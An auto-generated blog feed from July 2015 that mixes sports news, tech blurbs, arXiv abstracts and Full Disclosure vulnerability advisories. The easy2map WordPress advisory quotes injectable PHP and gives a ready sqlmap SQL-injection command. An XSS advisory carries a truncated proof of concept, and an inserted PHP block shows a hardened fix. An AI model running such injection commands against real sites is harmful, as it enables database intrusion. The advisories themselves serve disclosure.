Saturday, July 4, 2015

Blatter opens up in interview on FIFA scandal and his role in it

BERLIN (AP) FIFA president Sepp Blatter said in a Sunday newspaper interview that French and German presidents applied political pressure before the 2018 and 2022 World Cups were awarded to Russia and Qatar, respectively.

from FOX Sports Digital http://ift.tt/1IBVXRW
via IFTTT

Messi fails again with Argentina's national team

SANTIAGO, Chile (AP) Lionel Messi has come up short again in his attempt to succeed with Argentina's national team.

from FOX Sports Digital http://ift.tt/1HEBygm
via IFTTT

Blatter: French, German presidents tried influence WCup vote

BERLIN (AP) FIFA president Sepp Blatter says in a newspaper interview that French and German presidents applied political pressure before the 2018 and 2022 World Cups were awarded to Russia and Qatar, respectively.

from FOX Sports Digital http://ift.tt/1KC1Y2O
via IFTTT

Copa America final penalty shootout

SANTIAGO, Chile (AP) How the penalty shootout unfolded in the Copa America final at Estadio Nacional on Saturday:

from FOX Sports Digital http://ift.tt/1IXML6c
via IFTTT

Chile beats Argentina 4-1 on penalties to win Copa America

SANTIAGO, Chile (AP) Goalkeeper Claudio Bravo made a save and striker Alexis Sanchez converted the winning penalty as host Chile defeated Argentina 4-1 in a shootout after a 0-0 draw in the Copa America final on Saturday, finally winning its first major title.

from FOX Sports Digital http://ift.tt/1TcQ5Sq
via IFTTT

Orioles Video: Manny Machado hits 2-run HR in 8th, but Chris Davis robbed of HR in 9th in 3-2 loss to White Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Bud Norris moving to the bullpen, Kevin Gausman staying in the rotation, will start Tuesday vs. Twins (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Regimental Nicknames and Traditions of the British Army

Regimental Nicknames and Traditions of the British Army by Anonymous. Book Cover. Download; Bibrec. Bibliographic Record. Author, Anonymous.

from Google Alert - anonymous http://ift.tt/1Tcviym
via IFTTT

AP Exclusive: CONMEBOL head says 'we need total change'

SANTIAGO, Chile (AP) The president of CONMEBOL says it needs ''total and absolute change'' after becoming engulfed in the FIFA corruption scandal.

from FOX Sports Digital http://ift.tt/1CaFCm4
via IFTTT

2 Dinamo Zagreb bosses arrested over bribery charges

ZAGREB, Croatia (AP) Croatian police have arrested two Dinamo Zagreb bosses who are suspected of tax evasion and bribery.

from FOX Sports Digital http://ift.tt/1LOLlkG
via IFTTT

Here's How You Can Replace Your iPhone Battery For Free

Nothing is scarier than your iPhone alerting you that your battery has hit 5%, especially when you just took it off the charger with a 100 percent full battery about an hour ago. To be very honest, it literally sucks. However, you need not worry about this problem now, as there's a solution. Apple has just modified its warranty programs to make it easier for you to get your iPhone


from The Hacker News http://ift.tt/1KAy5zT
via IFTTT

[FD] Google HTTP Live Headers v1.0.6 - Client Side Cross Site Scripting Web Vulnerability

Document Title:
===============
Google HTTP Live Headers v1.0.6 - Client Side Cross Site Scripting Web Vulnerability

References (Source):
====================
http://ift.tt/1GQsZIA

Release Date:
=============
2015-07-02

Vulnerability Laboratory ID (VL-ID):
====================================
1541

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
The Chrome Web Store is Google`s online store for web applications for Google Chrome or Google Apps. It was announced at the Google I/O conference on May 19, 2010 by Vic Gundotra and released on December 6, 2010. The software allows users to install and run web applications for the Google Chrome browser. The Chrome Web Store user experience and design was created by Fi. Applications, browser themes and extensions in the store are written in HTML, CSS, JavaScript and Google Apps Script and, from Chrome 14, can use Google Native Client. The store hosts free and paid applications. An example of applications available in the store includes the game Plants vs. Zombies. The Store has been described as being like Google Play, but for `apps on the web`. A visual and UI overhaul of the store was announced on October 25, 2011.

(Copy of the Homepage: http://ift.tt/1GWr5ad )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Google (Chrome Webstore) HTTP Live Headers v1.0.6 addon.

Vulnerability Disclosure Timeline:
==================================
2015-07-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Google (Chrome Webstore) HTTP Live Headers v1.0.6 addon. The non-persistent cross site vulnerability allows remote attackers to inject own script code to the client-side of the vulnerable online-service module.

The vulnerability is located in the `url` value of the `HTTP LIVE HEADERS` module. Remote attackers are able to inject own script codes to client-side application requests. The attack vector is non persistent and the request method to inject/execute is GET. The vulnerable source is located in the google chrome http live headers v1.0.6 addon.

The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] HTTP LIVE HEADERS

Vulnerable File(s):
[+] /webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews

Vulnerable Parameter(s):
[+] URL

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
GET /#">

[FD] Ebay Inc Magento Bug Bounty #16 - CSRF Web Vulnerability

Document Title:
===============
Ebay Inc Magento Bug Bounty #16 - CSRF Web Vulnerability

References (Source):
====================
http://ift.tt/1GQsZIw

Ebay Inc Security ID: EIBBP-31808

Release Date:
=============
2015-07-02

Vulnerability Laboratory ID (VL-ID):
====================================
1472

Common Vulnerability Scoring System:
====================================
2.5

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-04-19: Researcher Notification & Coordination (Hadji Samir)
2015-04-20: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2015-04-26: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-06-15: Vendor Fix/Patch (Magento Developer Team)
2015-06-30: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-07-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Connect Web Application 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A cross site request forgery web vulnerability has been discovered in the official Magento Commerce online service web-application. The vulnerability allows to execute functions without secure validation to compromise user content in the online service web-application.

The vulnerability is located in the /claim/claim/new/ id value POST method request of the magento connect claim module. Remote attackers with low privileged user accounts are able to perform a malicious request of other users without auth. The request method is POST and the issue attack vector is client-side (non-persistent).

The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. Exploitation of the cross site request forgery vulnerability requires no privileged web application user account and no user interaction. Successful exploitation of the web vulnerability results in unauthorized execution of web functions via client-side in the users web context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] magento-connect/claim/claim/new/

Proof of Concept (PoC):
=======================
The csrf web vulnerability can be exploited by remote attackers without privileged application user account and medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: magento-connect/claim/claim/new/

Note: The POST method request has no csrf token or key that protects the session data.

Reference(s):
http://ift.tt/gRsn9E
http://ift.tt/P3pbMn
http://ift.tt/1GWr3iB
http://ift.tt/1GWr3iz

Solution - Fix & Patch:
=======================
The web vulnerability can be patched by implementation of a cross site request forgery token or a session key. Both prevents by protecting the session credentials and secure web module functions.

Security Risk:
==============
The security risk of the client-side cross site request forgery web vulnerability in the magento commerce application is estimated as medium. (CVSS 2.5)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x
Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab
Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS
Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] WK UDID v1.0.1 iOS - Command Inject Vulnerability

Gello: Cyanogen's Customizable Web Browser for Android

Get ready for a new Android Browser! Android ROM developer CyanogenMod has announced that it is working on a new browser for Android devices. Dubbed Gello, the open-source browser is based on Google's Chromium project and includes a ton of customization options for Android. The team provided a first look of Gello through a demo video that actually reveals a lot about the new Android


from The Hacker News http://ift.tt/1M1b4Dr
via IFTTT

This 20-year-old Student Has Written 100 Malware Programs in Two Years

Security firm Trend Micro has identified a 20-year-old Brazilian college student responsible for developing and distributing over 100 Banking Trojans selling each for around US$300. Known online as 'Lordfenix', 'Hacker's Son' and 'Filho de Hacker', the computer science student first began his career by posting in forums, asking for programming help for a Trojan he was developing,


from The Hacker News http://ift.tt/1falG8J
via IFTTT

Anonymous on Twitter: "Private Messages Leaked after Plex Forums Hack http://t.co/PAgC0LAb27 ...

... Gaber · McCourt Cordingley · OlgaMaria Carmen · Brady · RecKLeSS_DeaTH_ · Marccisi HD · Anonymous · News For Anons · Anonymous News.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/LatestAnonNews/status/617117580529025024&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEcIkOh9SzSpDpOyoqsBl9XrCjDUQ
via IFTTT

Africa's soccer strongman a candidate for FIFA president?

DOUALA, Cameroon (AP) The son of a sultan from northern Cameroon, Issa Hayatou has ruled African soccer for 27 years and counting, a decade longer than Sepp Blatter has been in charge of FIFA.

from FOX Sports Digital http://ift.tt/1GWC02G
via IFTTT

Anonymous users can checkout

Anonymous users, in order to purchase a product and checkout must Be able to add an item to the cart Access checkout Have ability to enter a coupon ...

from Google Alert - anonymous http://ift.tt/1LNT6HH
via IFTTT

Re: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

Venus and Jupiter are Far


On June 30 Venus and Jupiter were actually far apart, but both appeared close in western skies at dusk. Near the culmination of this year's gorgeous conjunction, the two bright evening planets are captured in the same telescopic field of view in this sharp digital stack of images taken after sunset from Poznań in west-central Poland. In fact, banded gas giant Jupiter was about 910 million kilometers from Poland. That's over 11 times farther than crescent Venus, only 78 million kilometers distant at the time. But since the diameter of giant planet Jupiter is over 11 times larger than Venus both planets show about the same angular size. Of course, 16th century Polish astronomer Nicolaus Copernicus would also have enjoyed the simultaneous telescopic view including Jupiter's four Galilean moons and a crescent Venus. Observations of Jupiter's moons and Venus' crescent phase were evidence for the Copernican or heliocentric model of the solar system. via NASA http://ift.tt/1f7lqY8

Friday, July 3, 2015

Orioles Video: Ubaldo Jimenez allows solo HR in 1-0 loss to White Sox; Adam Jones 0-for-3, now 1-for-33 vs. John Danks (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Peru beats Paraguay 2-0 to finish 3rd in Copa America

CONCEPCION, Chile (AP) Andre Carrillo and Paolo Guerrero each scored second-half goals to help Peru defeat Paraguay 2-0 in the third-place game at the Copa America on Friday.

from FOX Sports Digital http://ift.tt/1H5qsgN
via IFTTT

Dempsey, Chandler score as US beats Guatemala 4-0

NASHVILLE, Tenn. (AP) Clint Dempsey converted a penalty kick in his return from a suspension for a confrontation with a referee, Timmy Chandler scored his first international goal and the United States routed Guatemala 4-0 Friday night in an exhibition ahead of the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1IWTNbu
via IFTTT

Barcelona loans defender Martin Montoya to Inter Milan

BARCELONA, Spain (AP) Barcelona says it has agreed to loan its defender Martin Montoya to Inter Milan for a season.

from FOX Sports Digital http://ift.tt/1Kz5A5D
via IFTTT

Federico Fazzi (@federicofazzi) favorited one of your Tweets!

Federico Fazzi favorited your Tweet.

Patrick McGuire @mistermcguire: [FD] Snorby 2.6.2 - Stored Cross-site Scripting Vulnerability ift.tt/1KC3alc

Source: Gmail -> IFTTT-> Blogger

Orioles: Who is baseball's best manager? ESPN.com survey says Giants' Bruce Bochy, but Buck Showalter is best tactician (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Braxton Thomas
A page dedicated to saving the cats & kittens at the NYC ACC. NYC Urgent Cats is run by volunteers and NOT affiliated with the shelter.
Chadbourn town, NC, USA

Following: 1082 - Followers: 31

July 03, 2015 at 07:06PM via Twitter http://twitter.com/braxtonw92

Altidore, Dempsey rejoin US lineup against Guatemala

NASHVILLE, Tenn. (AP) Clint Dempsey and Jozy Altidore are back in the U.S. starting lineup, among five players U.S. coach Jurgen Klinsmann changed for Friday's exhibition against Guatemala ahead of the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1dDh6hD
via IFTTT

Re: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

[FD] ipTIME n104r3 vulnerable to CSRF and XSS attacks

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [##2255763##] ManageEngine Password Manager Pro 8.1 SQL Injection vulnerability

Hi Blazej,

Thanks for raising this issue. We have fixed the vulnerability and have released a hot fix release today. We will send out a security advisory to all our customers shortly. You can upgrade PMP to latest version or install the new version 8101 to fix the issue. You can access the release notes from the below mentioned link.

http://ift.tt/1LNf51p

Let us know if you have any further questions.

Thanks & Regards,
Mike [Technical Consultant | Password Manager Pro]

Source: Gmail -> IFTTT-> Blogger

[FD] SQL Injection in easy2map wordpress plugin v1.24

Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: http://ift.tt/1HAk8kN
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: http://ift.tt/1JDLwvL
Advisory: http://ift.tt/1HAk8kP

Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.

Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database.

Function.php, lines 90-92:

    $wpdb->query(sprintf("UPDATE $mapsTable
        SET PolyLines = '%s'
        WHERE ID = '%s';", $PolyLines, $mapID));

Function.php, lines 163-211:

    $wpdb->query(sprintf("
        UPDATE $mapsTable
        SET TemplateID = '%s',
            MapName = '%s',
            Settings = '%s',
            LastInvoked = CURRENT_TIMESTAMP,
            CSSValues = '%s',
            CSSValuesList = '%s',
            CSSValuesHeading = '%s',
            MapHTML = '%s',
            IsActive = 1,
            ThemeID = '%s'
        WHERE ID = %s;",
        $Items['mapTemplateName'],
        $Items['mapName'],
        urldecode($Items['mapSettingsXML']),
        urldecode($Items["mapCSSXML"]),
        urldecode($Items["listCSSXML"]),
        urldecode($Items["headingCSSXML"]),
        urldecode($Items["mapHTML"]),
        $Items['mapThemeName'],
        $mapID));
    } else {

        //this is a map insert
        if (!$wpdb->query(sprintf("
            INSERT INTO $mapsTable(
                TemplateID,
                MapName,
                DefaultPinImage,
                Settings,
                LastInvoked,
                PolyLines,
                CSSValues,
                CSSValuesList,
                CSSValuesHeading,
                MapHTML,
                IsActive,
                ThemeID
            ) VALUES ('%s', '%s', '%s', '%s',
                CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
            $Items['mapTemplateName'],
            $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
            urldecode($Items['mapSettingsXML']), '',
            urldecode($Items["mapCSSXML"]),
            urldecode($Items["listCSSXML"]),
            urldecode($Items["headingCSSXML"]),
            urldecode($Items["mapHTML"]),
            $Items['mapThemeName'])))

Function.php, lines 267-272:

    $wpdb->query(sprintf("
        UPDATE $mapsTable
        SET MapName = '%s',
            LastInvoked = CURRENT_TIMESTAMP,
            IsActive = 1
        WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php, code isn't sanitized when creating a directory allowing ../ to create files outside of intended directory:

MapPinImageSave.php, lines 4-15:

    $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
    . .
    if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {

        if (!file_exists($imagesDirectory)) {
            mkdir($imagesDirectory);
        }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:

Exploit Code:

    $ sqlmap -u 'http://ift.tt/1TaHlfm' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3

Source: Gmail -> IFTTT-> Blogger
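
The two defects described in the easy2map advisory above, set beside a hardened form. This is an added example, not the plugin's code or its v1.25 patch: PDO with an in-memory SQLite table stands in for WordPress's `$wpdb` so the script runs on its own, and the function names, base path and sample values are constructed. In WordPress the same separation of query text and values is available through `$wpdb->prepare()`.

```php
<?php
// Added example: not the plugin's code and not its v1.25 patch.
// PDO + in-memory SQLite stand in for $wpdb; names and sample values are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE maps (ID INTEGER PRIMARY KEY, MapName TEXT, IsActive INTEGER, LastInvoked TEXT)");
$db->exec("INSERT INTO maps (ID, MapName, IsActive) VALUES (11, 'old name', 0), (12, 'other map', 0)");

// Same shape as Function.php lines 267-272 in the advisory:
// request values are pasted into the SQL text before it is parsed.
function rename_map_sprintf(PDO $db, string $mapName, string $mapID): void
{
    $db->exec(sprintf(
        "UPDATE maps SET MapName = '%s', LastInvoked = CURRENT_TIMESTAMP, IsActive = 1 WHERE ID = %s;",
        $mapName,
        $mapID
    ));
}

// Map IDs are integers, so anything that is not plain decimal digits is rejected up front.
function require_map_id(string $mapID): int
{
    if (preg_match('/\A[0-9]{1,9}\z/', $mapID) !== 1) {
        throw new InvalidArgumentException('map id must be a decimal integer');
    }
    return (int) $mapID;
}

// Hardened form: the statement is parsed first, the values are bound afterwards as data.
function rename_map_prepared(PDO $db, string $mapName, string $mapID): int
{
    $stmt = $db->prepare(
        'UPDATE maps SET MapName = :name, LastInvoked = CURRENT_TIMESTAMP, IsActive = 1 WHERE ID = :id'
    );
    $stmt->bindValue(':name', $mapName, PDO::PARAM_STR);
    $stmt->bindValue(':id', require_map_id($mapID), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Hardened form of the MapPinImageSave.php path: only a validated integer reaches the directory name.
function pin_upload_dir(string $base, string $mapID): string
{
    return rtrim($base, '/') . '/' . require_map_id($mapID) . '/';
}

// 1. An ordinary name containing a quote is enough to change the SQL in the sprintf version.
try {
    rename_map_sprintf($db, "Tom's map", '11');
    echo "sprintf : statement executed\n";
} catch (PDOException $e) {
    echo "sprintf : input was parsed as SQL -> ", $e->getMessage(), "\n";
}

// 2. The prepared version stores the same name, and the advisory's URL-decoded
//    mapName test value, as plain text in row 11 only.
foreach (["Tom's map", "' or 1==1;"] as $name) {
    $rows = rename_map_prepared($db, $name, '11');
    $stored = $db->query('SELECT MapName FROM maps WHERE ID = 11')->fetchColumn();
    echo "prepared: rows=$rows stored=", var_export($stored, true), "\n";
}
echo "row 12  : ", $db->query('SELECT MapName FROM maps WHERE ID = 12')->fetchColumn(), "\n";

// 3. A map_id containing ../ never becomes part of a path.
$base = '/srv/wp-content/uploads/easy2map/images/map_pins/uploaded'; // constructed base path
foreach (['11', '../../outside'] as $id) {
    try {
        echo "upload  : ", pin_upload_dir($base, $id), "\n";
    } catch (InvalidArgumentException $e) {
        echo "upload  : rejected ", var_export($id, true), "\n";
    }
}
```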

Re: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied

[FD] Snorby 2.6.2 - Stored Cross-site Scripting Vulnerability

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari. DW

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] Re: Google Chrome Address Spoofing (Request For Comment)

Sonata à 4 in D major, S-Uu 11:15 (Anonymous)

Universitetsbibliotek, Uppsala (S-Uu): Instr.mus.i hs. 11:15. This file is based on high-resolution images obtained from the source using a method ...

from Google Alert - anonymous http://ift.tt/1LNbS1D
via IFTTT

Working with anonymous donors

If your organization would like to attract funds from these types of donors, you should be aware of why people remain anonymous and how you can ...

from Google Alert - anonymous http://ift.tt/1LNbRLk
via IFTTT

I have a new follower on Twitter


Selinda Bianco
I wanna be a writer when i grow up :)


Following: 613 - Followers: 368

July 03, 2015 at 02:35PM via Twitter http://twitter.com/LovelySelinda

Shanghai to host Italian Super Cup between Juve and Lazio

MILAN (AP) The Italian Super Cup between Juventus and Lazio will be played Aug. 8 in Shanghai.

from FOX Sports Digital http://ift.tt/1IVJRPw
via IFTTT

Barcelona loans defender Montoya Torralbo to Inter Milan

BARCELONA, Spain (AP) Barcelona says it has agreed to loan its defender Martin Montoya Torralbo to Inter Milan for a season.

from FOX Sports Digital http://ift.tt/1C6BQtU
via IFTTT

Present a message to Anonymous submitter that they are limited to one submission

I'm trying to avail myself of the experimental session ID tracking feature for anonymous submitters. The form (a petition) is limited to one submission ...

from Google Alert - anonymous http://ift.tt/1Iz0VyQ
via IFTTT

Udinese presents Ali Adnan as first Iraqi player in Serie A

UDINE, Italy (AP) Fullback Ali Adnan Kadhim has been presented as the first Iraqi player in Serie A.

from FOX Sports Digital http://ift.tt/1GTNMMp
via IFTTT

UEFA lifts Man City, PSG sanctions after clubs curb spending

NYON, Switzerland (AP) UEFA has lifted key Financial Fair Play sanctions from Manchester City and Paris Saint-Germain after both clubs met spending limits imposed last year.

from FOX Sports Digital http://ift.tt/1dBE34X
via IFTTT

Lyon signing of Beauvue clears path for Lacazette sale

PARIS (AP) Lyon has signed prolific forward Claudio Beauvue from Guingamp, clearing the way to sell in-demand top-scorer Alexandre Lacazette.

from FOX Sports Digital http://ift.tt/1UgHgZ2
via IFTTT

Indonesian tsunami survivor joins Sporting Lisbon as trainee

LISBON, Portugal (AP) An Indonesian who as a child survived the 2004 earthquake-tsunami that hit his country and was found wearing a Portugal soccer jersey is joining Sporting Lisbon's training academy.

from FOX Sports Digital http://ift.tt/1HAIXeC
via IFTTT

Nicolas Anelka to manage as well as play for Mumbai City

MUMBAI, India (AP) Former France striker Nicolas Anelka agreed to player-manage Mumbai City on Friday in his second season with the Indian Super League club.

from FOX Sports Digital http://ift.tt/1GUePGp
via IFTTT

Berlusconi demands AC Milan return to Champions League

MILAN (AP) AC Milan president Silvio Berlusconi has demanded new coach Sinisa Mihajlovic to lead the club back into the Champions League.

from FOX Sports Digital http://ift.tt/1dBq4vZ
via IFTTT

Brazilian refs sending message to players: Stop the whining!

SAO PAULO (AP) Brazilian referees are done with tolerating whining players.

from FOX Sports Digital http://ift.tt/1T9AF1c
via IFTTT

North America Runs Out of IPv4 Addresses

The Internet is running out of IPv4 (Internet Protocol version 4) addresses — a computer’s unique address on the Internet. It’s just become harder to get IPv4 addresses. IPv4 Exhaustion Gets Real. Is this the end of IPv4 addresses? Finally, North America has officially exhausted its supply of IPv4 addresses, joining Asia, Europe, and Latin America.


from The Hacker News http://ift.tt/1IxPhEs
via IFTTT

I have a new follower on Twitter


PhysicsForums.com
Join the largest & highest quality science community with 200K+ members. Discussions in #physics, #astronomy, #STEM, #engineering, #math etc!
USA
http://t.co/Pu7YM1JW5Y
Following: 2109 - Followers: 4812

July 03, 2015 at 03:57AM via Twitter http://twitter.com/physicsforums

Let's Take a Selfie to Shop Online With MasterCard

Difficulty in remembering complicated passwords? Forget passwords and fingerprints now – and get ready to authenticate your online purchases with your SELFIES. MasterCard is experimenting with a new app that would let you make online purchases by taking a selfie rather than typing a password, moving a step forward in the mobile payments evolution. This experimental ID Check security system


from The Hacker News http://ift.tt/1KwPERt
via IFTTT

Anonymous 4 comes to Rockport on farewell tour

Anonymous 4, the popular, eclectic, and wildly successful female a cappella vocal quartet, comes to the Rockport Chamber Music Festival on its final ...

from Google Alert - anonymous http://ift.tt/1KwNYar
via IFTTT

I have a new follower on Twitter


AixaM,n,c,k,s
These are my tweets, I think they are fun, jlife is nice and fun:P


Following: 1270 - Followers: 265

July 03, 2015 at 01:52AM via Twitter http://twitter.com/AixaMincks

Copa America: Argentina, Chile trying to end title drought

SANTIAGO, Chile (AP) The South American title won't be the only thing at stake when Argentina and Chile meet in Saturday's Copa America final.

from FOX Sports Digital http://ift.tt/1Cfj4AR
via IFTTT

Venus and Jupiter are Close


On June 30, Venus and Jupiter were close in western skies at dusk. Near the culmination of this year's gorgeous conjunction, the two bright evening planets are captured in the same telescopic field of view in this image taken after sunset from Beijing, China. As the two bright planets set together in the west, a nearly Full Moon rose above the horizon to the south and east. Imaged that night with the same telescope and camera, the rising Moon from the opposite part of the sky is compared with the planetary conjunction for scale in the digitally composited image. The full lunar disk covers an angle of about 1/2 degree on the sky. Visible as well in binoculars and small telescopes are Venus' crescent and Jupiter's four Galilean moons. Of course, Venus and Jupiter are still close. via NASA http://ift.tt/1Ub1e7E

Thursday, July 2, 2015

I have a new follower on Twitter


Matrix

atlanta, ga

Following: 1144 - Followers: 144

July 02, 2015 at 11:29PM via Twitter http://twitter.com/matrix_daily

Orioles Video: LF David Lough crashes into wall to make catch, robs another hit with sliding catch in loss to Rangers (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ro0ted on Twitter: "#Anonymous Shuts Down Canada Spy Agency Website #OpbillC51 https://t.co ...

#Anonymous Shuts Down Canada Spy Agency Website #OpbillC51 ... @ro0ted @AnonOpsSE Ehehhh, "The online hacktivist Anonymous conducted.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/ro0ted/status/616325621514391553&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFgXQzOvE7rk7jnC7PE8Bcf-FblcA
via IFTTT

An Empirical Evaluation of True Online TD($\lambda$). (arXiv:1507.00353v1 [cs.AI])

The true online TD($\lambda$) algorithm has recently been proposed (van Seijen and Sutton, 2014) as a universal replacement for the popular TD($\lambda$) algorithm, in temporal-difference learning and reinforcement learning. True online TD($\lambda$) has better theoretical properties than conventional TD($\lambda$), and the expectation is that it also results in faster learning. In this paper, we put this hypothesis to the test. Specifically, we compare the performance of true online TD($\lambda$) with that of TD($\lambda$) on challenging examples, random Markov reward processes, and a real-world myoelectric prosthetic arm. We use linear function approximation with tabular, binary, and non-binary features. We assess the algorithms along three dimensions: computational cost, learning speed, and ease of use. Our results confirm the strength of true online TD($\lambda$): 1) for sparse feature vectors, the computational overhead with respect to TD($\lambda$) is minimal; for non-sparse features the computation time is at most twice that of TD($\lambda$), 2) across all domains/representations the learning speed of true online TD($\lambda$) is often better, but never worse than that of TD($\lambda$), and 3) true online TD($\lambda$) is easier to use, because it does not require choosing between trace types, and it is generally more stable with respect to the step-size. Overall, our results suggest that true online TD($\lambda$) should be the first choice when looking for an efficient, general-purpose TD method.



from cs.AI updates on arXiv.org http://ift.tt/1UeFIPr
via IFTTT

Fast Convergence of Regularized Learning in Games. (arXiv:1507.00407v1 [cs.GT])

We show that natural classes of regularized learning algorithms with a form of recency bias achieve faster convergence rates to approximate efficiency and to correlated equilibria in multiplayer normal form games. When each player in a game uses an algorithm from our class, their individual regret decays at $O(T^{-3/4})$, while the sum of utilities converges to an approximate optimum at $O(T^{-1})$--an improvement upon the worst case $O(T^{-1/2})$ rates. We show a black-box reduction for any algorithm in the class to achieve $O(T^{-1/2})$ rates against an adversary, while maintaining the faster rates against algorithms in the class. Our results extend those of [Rakhlin and Shridharan 2013] and [Daskalakis et al. 2014], who only analyzed two-player zero-sum games for specific algorithms.



from cs.AI updates on arXiv.org http://ift.tt/1JB6JcL
